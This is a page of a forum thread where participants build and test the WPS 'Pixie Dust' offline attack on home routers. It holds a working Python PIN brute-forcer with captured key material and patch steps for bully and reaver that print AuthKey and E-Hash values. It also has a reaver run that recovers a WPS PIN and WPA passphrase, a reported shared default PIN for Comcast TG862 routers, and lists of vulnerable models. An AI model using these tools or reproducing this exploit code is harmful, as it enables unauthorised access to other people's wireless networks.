Page 2 of 12 FirstFirst 123456789101112 LastLast
Results 51 to 100 of 583

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #51
    Join Date
    2014-Oct
    Posts
    44
    seems like there's an another project on Pixie Dust.
    http://www.crack-wifi.com/forum/topi...ns.html#p75984

    only it's in French.
    any natives?

  2. #52
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Need to modify bully. That French forum is essentially the same thing as we have on here

  3. #53
    Join Date
    2013-Sep
    Posts
    262
    @kcdtv
    Yeah, I know what you mean referring to the checksum digit: computing it everytime or having an array of already pre-computed digits. Could be an option.
    In any case bruteforcing 11'000 digits or 20'000 doesn't make any difference on modern processors (after the PRNG seed is bruteforced). Also, if the PIN is chosen by the user, then it's most likely that the checksum won't match (odds are 1/10).
    Normally the router should correct the checksum and just admit valide PIN (that respects the rules of the wifi aliance) also a few routers showed to admit non-legitmate PIN (without checksum)
    Anyway that's a detail and as you sayed wil not make any difference...
    The next big chalenge is to set the brute force of the seed for models with a "more complex" pattern than ES-1=ES-2=0
    I'm not sure about your question on the AuthKey. It is the key used in the HMAC_SHA-256 hash function and it's 32 bytes (256 bits) long (it's not truncated).
    To make an example: E-Hash1 = HMAC_SHA-256{AuthKey [32 bytes]}(ES-1 [16 bytes] || PSK1 [16 bytes] || PKE [192 bytes] || PKR [192 bytes]).
    my english is so-so and i often difficulties to understand myself in shakspeare's language. People says english is easy but they are wrong, or it is because they don not mind to speak with faults or imprecisly
    By the way you exactly answered my questions
    Thanks

    Quote Originally Posted by wn722 View Post
    seems like there's an another project on Pixie Dust.
    http://www.crack-wifi.com/forum/topi...ns.html#p75984

    only it's in French.
    any natives?
    i am native and i actually moderate this forum with Spawn ("qolund" here, see message #32)
    We are working all together, don't wory for this, if we discover something relevant in crack-wifi.com i will post it as soon as poosible here in english.
    wiite did half of the job by
    1) making the first public attack vs ralink
    2) coding the "Ralink" case ES-1=ES-2=NULL
    we need to do the second half
    1) making the first atack vs broadcom
    2) coding the broadcom case where brute force of PRNG is needed
    and we are all there basically... Yesterday we made half of the way

    I also openedd a thread on a spanish forum to get more colaboration (but we just started it, it is stil not offcialy launch and we are 2 admin with 2 users )
    abnyway, if something comes out one way or the other it wil be known here inmediatly

    let's keep on the good work! Cheers to everybody

  4. #54
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by kcdtv View Post
    Normally the router should correct the checksum and just admit valide PIN (that respects the rules of the wifi aliance) also a few routers showed to admit non-legitmate PIN (without checksum)
    Let me quote part the WPS specification document (hope I'm allowed):

    "For 8-digit numeric PINs, the last digit in the PIN is used as a checksum of the other digits. This has the disadvantage of reducing the entropy of the PIN. It has the advantage, however, of enabling errors in user input of the PIN to be detected and potentially corrected before the PIN is actually used in the Registration Protocol. Users of course are not expected to compute checksums for passwords they choose, so user-specified Device Passwords do not include a checksum digit."

    "Checksum digits are only included and validated for the Default (PIN) device password type, and only if an 8-digit PIN is used."

    You may be right but of course, vendors do what they want... we know. I saw PINs that didn't match the checksum too. I'll add the checksum optimization soon.

    Quote Originally Posted by kcdtv View Post
    People says english is easy but they are wrong, or it is because they don not mind to speak with faults or imprecisly.
    English IS difficult, a new language is. That's why Esperanto was invented By the way, I'm a non-native speaker. I learned english (mostly) on the Internet so my speaking could be a bit misleading sometimes.
    Last edited by wiire; 2015-03-20 at 18:05.

  5. #55
    Join Date
    2015-Mar
    Posts
    4
    @wiire, So when will be able to try your tool? Can you send your e-mail with p.m? Thanks

  6. #56
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by casperass View Post
    @wiire, So when will be able to try your tool? Can you send your e-mail with p.m? Thanks
    Soon hopefully. I'm kinda busy at the moment. I'll host the code on GitHub and make a new thread with tutorial when completed or available for "beta testing". Let's stick to the subject's thread for now. If someone has information or suggestions on the PNRG attack, please share.

  7. #57
    Join Date
    2013-Sep
    Posts
    262
    Quote Originally Posted by wiire
    You may be right but of course, vendors do what they want... we know. I saw PINs that didn't match the checksum too. I'll add the checksum optimization soon.
    I just know one case of a router model that has a default PIN that doesn't respect the checksum rule , it was used by telefonica (spanish ISP) and it is the "Amper" ASL-26555
    otherwise i always saw default PIN that respect the checksum rules
    for the checksum if you need any help i can explain you every step in details.
    this is the ZaoChunsheng C code called ComputePIN and at the end you can see the function he uses to generate the checksum with a while loop
    Code:
    #include <stdio.h>
    #include <stdlib.h></code>
     
    int main()
    {
     
    unsigned int wps_pin_checksum(unsigned int pin);
    int PIN = 0;
     
    printf("ComputePIN-C83A35\n");
    printf("Description:\n");
    printf("If your wireless router MAC address start with \"C83A35\",\n");
    printf("type the other six digits, you might be able to get the \n");
    printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");
    printf("Code by ZhaoChunsheng 04/07/2012 http://iBeini.com\n\n");
    printf("Input MAC Address(HEX):c83a35");
    scanf("%x",&PIN);
    printf("MAC Address(HEX) is: C83A35%X\n",PIN);
    printf("WPS PIN is: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000));
     
    return 0;
    }
     
    unsigned int wps_pin_checksum(unsigned int pin)
    {
    unsigned int accum = 0;
    while (pin)
    {
    accum += 3 * (pin % 10);
    pin /= 10;
    accum += pin % 10;
    pin /= 10;
    }
     
    return (10 - accum % 10) % 10;
    }

    If someone has information or suggestions on the PNRG attack, please share.
    This PDF is VERY interesting : it is realiy focused on brute force issues vs Diffie-Hellman
    Exploring Diffie-Hellman Encryption

  8. #58
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Anyone who has an XFINITY gateway... what are your model numbers? Seems like Comcast might have a HUGE problem to deal with soon...

  9. #59
    Join Date
    2015-Mar
    Posts
    2
    Quote Originally Posted by wiire View Post
    @soxrok2212
    Thank you for the explaination. I'll be sure to study the subject thoroughly when I'll have a bit more time. I'm a bit busy at them moment

    Anyway, while we're waiting for someone able to modifiy reaver/bully, I've made a little program.

    For now it just tries to bruteforce the PIN going throught all 20'000 combination (it doesn't use the checksum for now), assuming ES1 = ES2 = 0. Just feed it all the things needed:
    - PKe
    - PKr
    - AuthKey
    - E-Hash1
    - E-Hash2

    Tried on a TP-LINK (Ralink) and it just works. Bongard was right.

    <link removed>

    Here's a sample image:


    EDIT: added the image properly. Removed link.
    Can u post a mirror of the link?
    Thanks

  10. #60
    Join Date
    2015-Mar
    Posts
    2
    Can u post a mirror of the link?
    Thanks

  11. #61
    Join Date
    2015-Feb
    Posts
    6
    code removed
    Last edited by datahead; 2015-03-23 at 17:01.

  12. #62
    Join Date
    2015-Feb
    Posts
    6
    code removed
    Last edited by datahead; 2015-03-23 at 17:02.

  13. #63
    Join Date
    2014-Oct
    Posts
    44
    hey can anyone share the method of extracting
    PKe
    - PKr
    - AuthKey
    - E-Hash1
    - E-Hash2

    from cap files?

  14. #64
    Join Date
    2013-Sep
    Posts
    262
    @ dathead
    i dindn't learnt C or cryptologie (or maths) this week-end so I don't really get the details... (at all)
    If i undesrtand well vendors uses may have used this "random function" :
    http://opencores.org/ocsvn/openrisc/...t/src/rand.cxx
    thank you for sharing your code , great job
    Last edited by kcdtv; 2015-03-23 at 14:24.

  15. #65
    Join Date
    2014-Apr
    Posts
    8
    Hi Guys,

    I have coded the Pixie Dust Attack just when ES1=ES2=0 for Ralink devices. I have used the C code as test vector for the input data.
    You can find it here : https://bitbucket.org/dudux/wpsoffline/
    Code:
    import hashlib, hmac
    
    PK_E    = "11e11709c0836c10e5a93a415f7869c5351f7218ab68867c3a1f8dbb9b8f984c"\
              "e0eabcbfd212fdc04fd9b3675e9dd9578d53ed5904177bdbe4fe64008a4a47de"\
              "50e7fc6409dc750b295565f54f1fe78582d78de0fac72675677cb1c85c5ca46a"\
              "5fced284ad79a27b4c38038b207ee76d3d556d7c3606310e52f5c6123a1f4997"\
              "6566cc21c31d40e5412decb2712d07667ac0803b21ca1df15f8f25814dc313cf"\
              "7bcdffeac436b5f2d40ceb18df5d90ac1e545eddd43ec7e78d4970d313a65746".decode("hex")
    
    PK_R    = "531ff143e7ef3663de555704904fbe5417a2b465f175cf55e01ab94cff9156d3"\
    		  "b6c272d1315fa70c4719897cea28f984ba0eccf22e86f48d4f8a275fcc78e37a"\
    		  "b81e917a376e038595ab980d57898224aed228052f29efa6299f11cd4d7aa562"\
    		  "b7baf1404ae8a15b70c130718cb1e0db6a32af3be2eb073927ef414ea2fd5ced"\
    		  "6595a95c5e28fa3badf69ddb15f9f74deb1690139122eab14f99adc9d360f7d4"\
    		  "f066fab35b77a46eb7286172eae8dd7eda768849307f9b00f06d69571b9da243".decode("hex")
    
    eHash1  = "c14b83a3415999bba082f467872fd4bc9b79778b33d1d20cab55cb7d0b96cf43".decode("hex")
    eHash2  = "3516ace7cd46bcbcac83b3065be66a89186a54da8800d336041e8ab847929416".decode("hex")
    AuthKey = "d5c7e4a9fb5911b31dcbf80db712b34ed71a9218c9c111992c60d883e197e9ea".decode("hex")
    
    # if ES1,ES2 are found out, recover the halves of PIN
    second_half = first_half = 0
    es1         = es2        = '\00' * 16   # (str(es2).zfill(32)).decode('hex')
    for first_half in xrange(10000):
    	PSK1_guess   = hmac.new(AuthKey, (str(first_half)).zfill(4), hashlib.sha256).digest()[:16]
    	eHash1_guess = hmac.new(AuthKey, es1 + PSK1_guess + PK_E + PK_R, hashlib.sha256).digest()
    	if (eHash1 == eHash1_guess): #First half done
    		for second_half in xrange(10000):
    			PSK2_guess   = hmac.new(AuthKey, (str(second_half)).zfill(4), hashlib.sha256).digest()[:16]
    			eHash2_guess = hmac.new(AuthKey, es2 + PSK2_guess + PK_E + PK_R, hashlib.sha256).digest()
    			if (eHash2 == eHash2_guess): 
    				print "PIN FOUND!  %04d%04d" %(first_half,second_half)
    				# doWPSprotocolWithPINguessed() #TODO
    				exit()
    I am running out of time, but I would like to implement the bruteforce for the PRNG state for Broadcoms. After all, I would like to translate it to C into Reaver or bully. But surely someone is better C programmer and got more time than me.

    Proost!

  16. #66
    Join Date
    2014-Apr
    Posts
    8
    I forgot to say that: "I blindly implemented the attack in the proof-of-concept of "wpscrack.py". It is only useful for Ralink's devices as TPLINKS routers.
    I have not tested the attack in live! This code does the right offline bruteforcing. However, IT HAS NOT BEEN TESTED YET! Feel free to tweak it as you wish or do commit requests.

    Usage:
    wpscrack_mod:$ sudo python wpscrack.py -i mon0 -b [BSSID] -s [ESSID] --offline -vv

  17. #67
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Updated with a database in the original post

  18. #68
    Join Date
    2015-Mar
    Posts
    4
    dudux, It say all the time "PIN FOUND! 57334196" for every routers.

  19. #69
    Join Date
    2013-Mar
    Posts
    40
    Still Attack not available for BroadCom ..

  20. #70
    Join Date
    2015-Mar
    Posts
    1
    Quote Originally Posted by casperass View Post
    dudux, It say all the time "PIN FOUND! 57334196" for every routers.
    You need to edit the file and put your own data. I dont know where PKR,PKE data is in the packets, thats where im stuck.

    Tryed the tool and is giving me
    Code:
     Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    But im trying against Broadcom and not Ralink, as said above Broadcom is not implemented yet.

    I hope guys keep developing this subject, its very interesting but over my personal understanding to put in practice, so ill have to wait.
    Would it be feasible to add a import from cap feature? i guess that would put some testers running. Thanks everyone

  21. #71
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    @everyone There is NO official and complete tool available yet. Stop asking. When it is available, one of us will make a post.

  22. #72
    Join Date
    2015-Mar
    Posts
    141
    @dudux was the realtek.cap file what you used to make wpsOffline.py? Unless im doing it wrong, Im not getting the same pke, pkr, or any of it.

  23. #73
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    SMCD3GNV and WRT160Nv2 confirmed vulnerable!

  24. #74
    N4 Nethunter Guest
    the tool works i have corrected the code now
    @sorox2212

    cracked 3 routers
    and all of them were right

  25. #75
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Can you post the model numbers, manufacturers, and hardware numbers so I can add it to the database?

  26. #76
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Dudu has asked me to post a python implementation for Ralink devices! You can get it here: https://bitbucket.org/dudux/wpsoffli...e.py?at=master

    All credits go to dudu! Look at the help section for the arguments. Good luck an post any successes with models here! Thanks!!!!
    Last edited by soxrok2212; 2015-03-26 at 18:52.

  27. #77
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by Lisa Chu View Post
    You need to edit the file and put your own data. I dont know where PKR,PKE data is in the packets, thats where im stuck.

    Tryed the tool and is giving me
    Code:
     Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    But im trying against Broadcom and not Ralink, as said above Broadcom is not implemented yet.

    I hope guys keep developing this subject, its very interesting but over my personal understanding to put in practice, so ill have to wait.
    Would it be feasible to add a import from cap feature? i guess that would put some testers running. Thanks everyone
    Tried the tool also and it is only giving the same results, but i am trying against an ralink tplink router. Unmodified code does the same.
    Looking through the wireshark logs, it is attempting to authenticate, but the script isn't recognizing it is getting a response, I don't really
    know enough about python to dig into it, more of a perl guy than python. Starting to learn it though. Trying to extract the part in wpscrack.py
    that creates the authkey and feed it what it wants to spit out the authkey, if that's even going to work... From what I am reading about the
    KDK it only partialy makes sense to me.

    Tried the modified version of bully also, just seems to run normaly, trying pins and moving on to the next. Still confused on how this is
    supposed to give the Authkey, which is where I am stuck. I assume it doesn't give it to you automatically, so how do you get it to give
    the authkey?

    I can get everything else as it's in plain sight. I have a couple ralink routers at my disposal to test this on also.

    Code:
    maingroup.add_argument('-ak', '--AuthKey', type=str, nargs='?', help='AuthKey obtained from wireshark')
    I thought it wasn't obtained from wireshark and you had to run it through the KDK... That just confused me even more...

  28. #78
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    WPSCrack.py I guess only works with Atheros wireless adapters. Try this to get more info.. comes from Hack Forums:

    Code:
    int wpa_debug_level = MSG_INFO; // change it to MSG_DEBUG
    
    2: Or, manually add some prints in the (wpa_supplicant) source. Let's take as an example bully (you could try reaver if you wish):
    - Download the zip file. Unzip it.
    - Go to bully-master/src/wps and open wps_common.c with a text editor.
    - Go to line 122 and add something similar (just a print):
    Code:
        os_memcpy(wps->emsk, keys + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN,
              WPS_EMSK_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > AuthKey: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) {
            printf("%02x", *(wps->authkey + pixiecnt));
            if (pixiecnt != WPS_AUTHKEY_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        wpa_hexdump_key(MSG_DEBUG, "WPS: AuthKey",
    
    - Now open wps_registrar.c.
    - Go to line 1719 (inside wps_process_e_hash1 function) and add:
    Code:
        wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > E-Hash1: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
            printf("%02x", *(wps->peer_hash1 + pixiecnt));
            if (pixiecnt != WPS_HASH_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        return 0;
    
    - Then in the function below (inside wps_process_e_hash2) add:
    Code:
        wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > E-Hash2: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
            printf("%02x", *(wps->peer_hash2 + pixiecnt));
            if (pixiecnt != WPS_HASH_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        return 0;
    Then please post this here:

    Code:
    AP Manufacturer:
    Model name/number:
    Chipset: 
    
    N1 Nonce: 
    Authkey: 
    PKE: 
    PKR: 
    E-Hash1: 
    E:Hash2:
    First 3 are optional, last 6 are mandatory to crack.
    Last edited by soxrok2212; 2015-03-26 at 21:20.

  29. #79
    Join Date
    2014-Apr
    Posts
    8
    Yeah authkey is generated, sorry I just copied&pasted.........

    The code is right here. I guess that the community will release a fresh & quick patch for reaver or bully. Be patient and try to understand the flaw itself!

    Code:
        def gen_keys(self):
            pubkey_enrollee  = self.bignum_unpack(self.PK_E)
            pubkey_registrar = pow(2, self.secret_number, self.prime_int)
            shared_key       = self.bignum_pack(pow(pubkey_enrollee, self.secret_number, self.prime_int), 192)
    
            self.PK_R        = self.bignum_pack(pubkey_registrar, 192)        
            self.RNonce      = os.urandom(16)
            DHKey            = hashlib.sha256(shared_key).digest()
            KDK              = hmac.new(DHKey, self.ENonce + self.EnrolleeMAC + self.RNonce, hashlib.sha256).digest()
            self.AuthKey, self.KeyWrapKey, self.EMSK = self.kdf(KDK, 'Wi-Fi Easy and Secure Key Derivation', [256, 128, 256])
    
            self.R_S1 = '\00' * 16 #random enough
            self.R_S2 = '\00' * 16        
    
            self.PSK1   = hmac.new(self.AuthKey, self.pin[0:4], hashlib.sha256).digest()[:16]
            self.PSK2   = hmac.new(self.AuthKey, self.pin[4:8], hashlib.sha256).digest()[:16]       
            self.RHash1 = hmac.new(self.AuthKey, self.R_S1 + self.PSK1 + self.PK_E + self.PK_R, hashlib.sha256).digest()
            self.RHash2 = hmac.new(self.AuthKey, self.R_S2 + self.PSK2 + self.PK_E + self.PK_R, hashlib.sha256).digest()
    Last edited by dudux; 2015-03-26 at 22:32.

  30. #80
    Join Date
    2014-Aug
    Posts
    3
    Thanks for the script Dudux, worked for me on a belkin F5D8236-4 v3.

  31. #81
    Join Date
    2014-Apr
    Posts
    8
    @h4x0rm1k3: which script did you use?

  32. #82
    Join Date
    2013-Mar
    Posts
    40
    Well Explained Pixie Dust Attack in This Document...
    http://www.fileconvoy.com/dfl.php?id...611e6156c2908c

  33. #83
    Join Date
    2013-Sep
    Posts
    262
    Realy?
    ....Did you read the first post of this thread?
    Quote Originally Posted by soxrok2212
    WPSCrack.py I guess only works with Atheros wireless adapters
    Exactly: wpscrack doesn't works with USB adapaters (althought i didjn't try with "the" chipset USB atheros - ah9k_htc )
    It is according to me the worst and least interesting option ( compared to reaver or buly)
    cheers
    Last edited by kcdtv; 2015-03-29 at 01:33.

  34. #84
    Join Date
    2015-Mar
    Posts
    141
    Confirmed to work with TG862 v5
    Code:
    PK_E    = "1fa58df039d88bd13c4fce5dddf90dc5062f33f3d853e1675c793c5c0039102c3a9c82041e366f3e7fef39d050340bb134ce4c0c628657ecf48bb64bfea172409b21dfb760ab2c0b41d5577860c99a8625f06a8dc7e20c866c1656f1e94b37873e80b137a33b265149574a3a55183a6665d9ade3bce174a2f2e24c3bba1f6d53adaf75d8d966952772decbb776aeb43a7b1291f3f4e57572ffccd16ee81f74fc05f257fc1a7d98bdc8e31e81653119cf0f2f20db1744c3b503be7e8f11975148"
    
    PK_R    = "84bda17b3566d94551e34222eb01f1302bd3f57efddd8facddb14e2ddeddd616794e51a99e084d6c0f90bfea1fce7bdb7ce0951c04820a39685117ce9f4c54111d48c69318e9269ed4a4d77112b34418825517a9a772ddb448278ec849ec7177fcb8a925ba1ce34579a712af5e964a8394ef09c38bc34878ee965cbaa890cf0bf3a2500dd455193cf8d0443a65fdebb2312cae514968bf4090423795860fa5b419ff61f37ef25d2af364fabec0da547241e794e1b2ca7562aec072bcd76b9218
    eHash1  = "991ea46545f722945b7e356f58549264773a2d08b39129ee43ba818518044842"
    eHash2  = "e2b5ca0c9534d1dceb41327000d5e00ce973c27071726088b8b4c89d3c7ba487"
    AuthKey = "cbaa229e34bb288167c3412e5c9c32478a897e16cce47b8e3c4de9ef4eb2fcdb"
    Trying to find a bit more automation in this, because what i have to do now to get it to work is kind of a pain...

  35. #85
    Join Date
    2014-Oct
    Posts
    44
    Quote Originally Posted by aanarchyy View Post

    Trying to find a bit more automation in this, because what i have to do now to get it to work is kind of a pain...
    can you write that down?
    i'd like to give it a go as well
    cheers.

  36. #86
    Join Date
    2013-Jul
    Posts
    818
    Musket Teams have done the rewrite of bully as suggested in a thread above. One computer seems to provide all five keys, another computer only provides the keys -authkey hash1 and hash2 and only if the -o command is in the bully command line(ie write to file). It then appears on the screen not in the file. In this case you must also run wireshark to get the -pke and -pkr

    You must download the source file rewrite the two files in the install package then reinstall. If during reinstall you get a pcap.h warning then:

    sudo apt-get install libpcap-dev

    Then reinstall. Method for reinstall is found in the README.md

    If you are trying to rewrite reaver - (our team is working on this as we speak) note that the wps_common.c file works for both reaver and bully BUT the wps_registrar.c is different. You must rewrite each version of wps_registrar.c. The same command lines to change exist - but the reaver file has file links not found in bully causing the install to fail if the bully version is used.

    MTeams

  37. #87
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by aanarchyy View Post
    Confirmed to work with TG862 v5
    Did you actually test the pin with reaver/bully and find the WPA key? There has been an issue reported where TG862 tests report a false positive... I tested your data and got the same pin 42000648 as someone else who tested that same model.
    Last edited by soxrok2212; 2015-03-29 at 12:55.

  38. #88
    Join Date
    2015-Mar
    Posts
    141
    @soxrok2212 yes I did test the pin and it did work. Oddly enough I seem to be getting the same pin for multiple routers. The ones that have the default essid of HOME-XXXX all seem to be producing the same pin. I've only tested it on that one so far. Could xfinity have given the same pin to all the tg862 routers? That would be a MAJOR oops!

  39. #89
    Join Date
    2015-Mar
    Posts
    141
    Just checked the configuration of the router and the pin DOES NOT match. The pin in the configuration was 84237446

    Screenshot2.png

    But attempting 42000648 does indeed work!

    Code:
    root@kali:~/Desktop# reaver -b 00:AC:E0:3E:DB:10 -vv -i mon0 -p 42000648
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Waiting for beacon from 00:AC:E0:3E:DB:10
    [+] Switching mon0 to channel 6
    [+] Associated with 00:AC:E0:3E:DB:10 (ESSID: HOME-XXXX)
    [+] Trying pin 42000648
    [+] Sending EAPOL START request
    [+] Received iden***y request
    [+] Sending iden***y response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 9 seconds
    [+] WPS PIN: '42000648'
    [+] WPA PSK: 'basket1744chase'
    [+] AP SSID: 'HOME-XXXX'
    [+] Nothing done, nothing to save.
    But attempting the pin in the configuration doesn't work. And unless i am looking at this wrong, in the screenshot above, isn't wps pin entry diabled?
    Last edited by aanarchyy; 2015-03-29 at 16:57. Reason: Typo

  40. #90
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    I'm glad you tested it however, that is extremely weird. Perhaps Comcast uses this same undiscovered pin (until now) on all their TG862 models...?

  41. #91

    Confirmed

    I just had this same thing happen with a TG862

    M1 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
    M1 wps.public_key : 26523c5c10fbecb8dacebd499b943381dd5d959a19b0dd3de6 d6092296be009f6d0043e0d0468b6169640a42c2a755451d6a a21c0c9fa581868ffc39cb9b9dd61f75f2d1b37b10724fe526 3f2f0ef51d447a37c04d3634b3cadb864209b6288276daa193 10c1414162af40da6d5cf524791ce746fb4e6bb044fe531683 a4f57cd4e864a4beb6b9e397c10f1b2673306ef6ccb81e8cff 0086cbbddb546d2e33a4ce02f305d36f1a6d3e6a075dace5e4 54a7b7fc41b9df1a4739b67c071da0b4ba
    M2 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
    M2 wps.public_key : 1c5abc81aa3b2e019322275d81fdba8d781a670c7bbb2e72f1 41b9559fba622f1d664a2d088f3d86aec4ac054d8fe32afa61 5c44641e0b87736f5f533edbf4c2c170d38fab28aaadecb812 687b1d69f5314179c1b8c71d5f6302788a112826cb2e359703 d4039a9ee4c2c7d8f3cc2174db2738f67cc64677111d995680 42d38748fd0963cabda0ee6c2eb911d428647b9401df6d4ac7 5e7c9d57ddcf914bcf18f9dd138b3a09726b5c906f6a539cbe cab2fc2acd415168e424d4cd45db6f8008
    M2 wps.registrar_nonce : bdb64e739ce8e78915d839945a6a4882
    M2 wps.authenticator : 25706c21a1637948
    M3 wps.registrar_nonce : bdb64e739ce8e78915d839945a6a4882
    M3 wps.authenticator : 8c8ac40a5d2fba7c
    M3 wps.e_hash1 : 40d578a860d7c7b7fa9164734821be696de11dde1026b62e58 6027685d44bda6
    M3 wps.e_hash2 : 47f0d473cbb32fee2ebe20ce4f151c15a17d6b7695fa536ed7 779369de8e6a81
    M4 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
    M4 wps.authenticator : d1a7f72e8569b045
    M4 wps.encrypted_settings : 97e680a1c5c31d6ff777219bb0f1928cdbc056f38f894530cf f61b317343cd599b2a3501a7defe012fcab40097efa202e927 7d5605bfa84e62be20b985db5797
    M4 wps.r_hash1 : a9def4675aa789fe6f6d1cbb2e5a428184690698a6a65f9a80 05c147b5cd73a1
    M4 wps.r_hash2 : 2b84cb17f955b22fe165c4bfa2b81a0d41ae7681960269063f c7e11fd48660dc


    Client wps.manufacturer :
    Client wps.device_name :
    Client wps.os_version : 2147483648
    Client wlan.ta : 00:19:e3:06:7e:44
    Client wps.model_name :
    Client wps.model_number :
    Client wps.serial_number :
    AP wps.manufacturer : ARRIS
    AP wps.device_name : ARRIS TG862 Router
    AP wps.os_version : 2147483648
    AP wlan.ta : 00:1d:d6:ab:8f:40
    AP wps.model_name : TG862G
    AP wps.model_number : RT2860
    AP wps.serial_number : 12345678

    Adittionaly it appears to receive the creds then fail the WPS ?

    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
    <3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
    <3>Associated with 00:1d:d6:REDACTED
    <3>CTRL-EVENT-EAP-STARTED EAP authentication started
    <3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1
    <3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
    <3>WPS-CRED-RECEIVED 100e003c102600010110450009484f4d452d38463432100300 020022100f0002000c10270010314443384538303932413943 3030343110200006001dd6ab8f40
    <3>WPS-FAIL msg=11 config_error=0
    <3>CTRL-EVENT-EAP-FAILURE EAP authentication failed
    <3>WPS-FAIL
    <3>CTRL-EVENT-DISCONNECTED bssid=00:00:00:00:00:00 reason=3
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
    <3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
    <3>Associated with 00:1d:d6:REDACTED
    <3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
    <3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]
    <3>CTRL-EVENT-DISCONNECTED bssid=00:1d:d6:REDACTED reason=4
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
    <3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
    <3>Associated with 00:1d:d6:REDACTED
    <3>CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully (based on lower layer success)
    <3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
    <3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]



    Quote Originally Posted by aanarchyy View Post
    Just checked the configuration of the router and the pin DOES NOT match. The pin in the configuration was 84237446

    Screenshot2.png

    But attempting 42000648 does indeed work!

    Code:
    root@kali:~/Desktop# reaver -b 00:AC:E0:3E:DB:10 -vv -i mon0 -p 42000648
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Waiting for beacon from 00:AC:E0:3E:DB:10
    [+] Switching mon0 to channel 6
    [+] Associated with 00:AC:E0:3E:DB:10 (ESSID: HOME-XXXX)
    [+] Trying pin 42000648
    [+] Sending EAPOL START request
    [+] Received iden***y request
    [+] Sending iden***y response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 9 seconds
    [+] WPS PIN: '42000648'
    [+] WPA PSK: 'basket1744chase'
    [+] AP SSID: 'HOME-XXXX'
    [+] Nothing done, nothing to save.
    But attempting the pin in the configuration doesn't work. And unless i am looking at this wrong, in the screenshot above, isn't wps pin entry diabled?

  42. #92
    Join Date
    2014-Oct
    Posts
    44
    Quote Originally Posted by mmusket33 View Post
    Musket Teams have done the rewrite of bully as suggested in a thread above.
    MTeams
    hey. where exactly is that link?
    in first post of this topic or there's another topic?

